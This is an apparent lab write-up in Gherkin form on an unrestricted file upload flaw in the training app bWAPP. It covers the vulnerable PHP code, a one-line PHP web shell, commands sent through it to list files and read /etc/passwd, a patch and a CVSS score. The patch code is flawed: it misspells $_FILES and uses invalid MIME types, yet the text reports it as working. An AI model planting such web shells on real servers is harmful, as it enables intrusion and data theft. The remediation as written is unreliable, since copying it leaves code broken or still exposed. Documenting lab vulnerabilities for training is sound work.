## Version 1.4.0
## language: en

Feature:
  TOE:
    bWAPP
  Category:
    Other bugs
  Page name:
    bWAPP/unrestricted_file_upload.php
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.041: https://fluidattacks.com/web/es/rules/041/
  Goal:
    Upload a file with malicious code to access sensitive information
  Recommendation:
    Add type checks to restrict the uploadable file types

  Background:
  Hacker's software:
  |     <Software name>      |    <Version>    |
  |         bee-box          |       1.6       |
  |   VMWare Workstation 15  |     15.0.2      |
  |     Firefox Quantum      |    60.2.0esr    |
  |          Ubuntu          |      8.04       |
  TOE information:
    Given I'm running bee-box on VMWare on Ubuntu
    And I'm accessing the bWAPP pages through my Firefox browser
    And enter a php site that allows me to upload files of any type

  Scenario: Normal use case
  The site allows the upload of local images to the server
    Given I access the page bWAPP/unrestricted_file_upload.php
    And I click the Choose File button
    And I select a file
    And I click the Upload button
    Then I get a success message saying "The image has been uploaded here"
    Given I click on the "here" word of the previous message
    Then the file is opened

  Scenario: Static Detection
  The php code does not restrict the file types that can be uploaded
    When I look at the page source code
    Then I see the function that uploads the file for low security level:
    """
    29  switch($_COOKIE["security_level"])
    30  {
    31
    32      case "0" :
    33
    34          move_uploaded_file($_FILES["file"]["tmp_name"], "images/" \
                    . $_FILES["file"]["name"]);
    35
    36          break;
    """
    Then I notice there is no restriction or check on the type of the file

  Scenario: Dynamic detection
  The application allows the upload and execution of php files
    Given I manually upload a php file with the following code:
    """
    1  <?php
    2  system($_GET['cmd']);
    3  ?>
    """
    And I open it by clicking on the "here" link
    And type these parameters in the browser search field:
    """
    cmd=ls%20-l
    """"
    Then it is executed by the server
    And the List of files in the current folder can be read
    And this can be seen in [evidence](investigate-list-files.png)
    Then I notice I can run any commands on the server

  Scenario: Exploitation
  Retrieving the information from /etc/passwd
    Given I upload a php file with this code:
    """
    1  <?php
    2  system($_GET['cmd']);
    3  ?>
    """
    And open it by clicking on the "here" link
    And and pass the following parameters in the browser search field:
    """
    cmd=cats%20/etc/passwd
    """
    Then it is executed by the server
    And the contents of the /etc/passwd file can be read
    And this can be seen in [evidence](investigate-passwd.png)

  Scenario: Remediation
  The php code can be fixed by creating a list of allowed types
    Given I have patched the php code by creating a list of allowed file types
    And getting the type of the file the user wants to upload
    And checking if the type of the file is in the list
    Then I can allow or deny the upload
    And prevent users from uploading scripts
    """
    29  $file_error = "";
    30  $allowed_types = array('img/png', 'img/jpeg');
    31  switch($_COOKIE["security_level"]){
    32
    33     case "0" :
    34       $uploaded_file_type = $FILES["file"]["type"];
    35       $file_error = !(in_array($uploaded_file_type, $allowed_types));
    36
    37       if(!$file_error) {
    38         move_uploaded_file($_FILES["file"]["tmp_name"], "images/"
              . $_FILES["file"]["name"]);
    39       }
    40       else {
    41         $file_error = "The type of the selected file is not allowed.";
    42       }
    43       break;
    """
    Then If I re-run my exploit by uploading a php file, I get the message
    """
    The type of the selected file is not allowed.
    """
    Then I can confirm that the vulnerability was successfully patched
    And this can be seen in [evidence](investigate-uploading.png)
    And [evidence](investigate-error.png)

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.3/10 (Critical) - AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.8/10 (High) - E:F/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.4/10 (Medium) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2018-12-03
